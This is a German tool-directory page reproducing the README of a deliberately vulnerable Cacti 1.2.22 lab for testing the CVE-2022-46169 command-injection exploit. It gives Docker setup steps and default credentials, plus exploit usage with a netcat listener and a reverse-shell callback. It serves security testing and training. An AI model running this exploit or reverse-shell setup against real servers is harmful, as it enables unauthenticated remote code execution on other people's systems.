Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cacti-rce-cve-2022-46169-vulnerable-application — WARNUNG: Dies ist eine angreifbare Anwendung zum Testen des Exploits für die Cacti-Befehlsinjektion (CVE-2022-46169). Auf eigene Gefahr ausführen! | Kitploit
Tools/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLabs & Praxis
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

WARNUNG: Dies ist eine angreifbare Anwendung zum Testen des Exploits für die Cacti-Befehlsinjektion (CVE-2022-46169). Auf eigene Gefahr ausführen!

Repository anzeigen
123vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Cacti v1.2.22 Command Injection (CVE-2022-46169) verwundbare Anwendung

Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Schwachstelle (CVE-2022-46169).

WARNUNG!

Diese Anwendung enthält schwerwiegende Sicherheitslücken. Führen Sie sie auf eigenes Risiko aus! Es wird empfohlen, eine gesicherte und abgeschottete Umgebung zu verwenden (z. B. eine VM mit einem aktuellen Snapshot und Host-only-Netzwerk). Laden Sie diese Anwendung nicht auf öffentlich erreichbare Server hoch, da diese kompromittiert werden.

HAFTUNGSAUSSCHLUSS: Ich übernehme keine Verantwortung für die Art und Weise, wie jemand diese Anwendung verwendet. Der einzige Zweck dieser Anwendung ist es, ein Testszenario für den CVE-2022-46169-Exploit zu sein, und sie sollte nicht böswillig verwendet werden. Wenn Ihr Server über eine Installation dieser Anwendung kompromittiert wird, liegt das nicht in meiner Verantwortung, sondern in der Verantwortung der Person(en), die sie hochgeladen und installiert haben.

Informationen zur Schwachstelle

  • CVE-ID: CVE-2022-46169
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • Beschreibung: In betroffenen Versionen ermöglicht eine Command-Injection-Schwachstelle einem nicht authentifizierten Benutzer, beliebigen Code auf einem Server auszuführen, auf dem Cacti läuft, wenn für ein überwachtes Gerät eine bestimmte Datenquelle ausgewählt wurde.

Verwendung

Hier sind die Schritte zum Einrichten der Umgebung:

  1. Führen Sie docker compose up -d aus, um die Umgebung zu starten.
  2. Sie können die Schritte abschließen, indem Sie http://127.0.0.1/cacti aufrufen, um den Cacti-Initialisierungsassistenten zu starten. Wenn Sie einen Fehler bezüglich der Datenbank erhalten, warten Sie einen Moment und aktualisieren Sie die Seite.
  3. Die Standard-Anmeldeinformationen sind admin/admin.
  4. Klicken Sie während des Assistenten bei allen Schaltflächen auf "Weiter", und wählen Sie die Optionen entsprechend aus. Alle Standardeinstellungen sollten in Ordnung sein, und alle Pflichtvoraussetzungen sollten erfüllt sein.
  5. Nach der Installation müssen Sie einen neuen Graphen einrichten:
    1. Klicken Sie auf "Graphen erstellen".
    2. Wählen Sie im Abschnitt "Graphenvorlagen" im Dropdown-Menü neben "Erstellen" die Option "Device - Uptime" aus.
    3. Klicken Sie auf die Schaltfläche "Erstellen".

Der Container wird vuln-cacti genannt.

Zum Herunterfahren der Umgebung verwenden Sie den Befehl docker compose down.

Die offizielle Installationsanleitung von Cacti finden Sie hier.

Grundursache

Eine detaillierte Grundursache der Schwachstelle ist hier verfügbar.

Exploit

Ein öffentlicher Exploit ist auf Exploit-DB verfügbar. Er wurde der Einfachheit halber in den Ordner exploit/ kopiert.

Um ihn auszuführen:

  1. Verwenden Sie netcat auf dem Host-Rechner, um auf eingehende Verbindungen zu lauschen.
    root@kitploit:~
    nc -lvp 6669
    
  2. Starten Sie den Exploit.
    root@kitploit:~
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    
    Tipp: host.docker.internal wird verwendet, um vom Container aus auf den Host-Rechner zuzugreifen (Referenz).

Es gibt auch einen Eintrag im vulhub-Repository.

Autoren

  • Antonio Francesco Sardella - Implementierung - m3ssap0

Lizenz

Dieses Projekt ist unter der Unlicense lizenziert – siehe die Datei LICENSE für Details.

Danksagungen

  • Stefan Schiller, der Sicherheitsforscher, der die Schwachstelle entdeckt hat.
  • Riadh Bouchahoua, der Entwickler des Exploits.
Tool herunterladen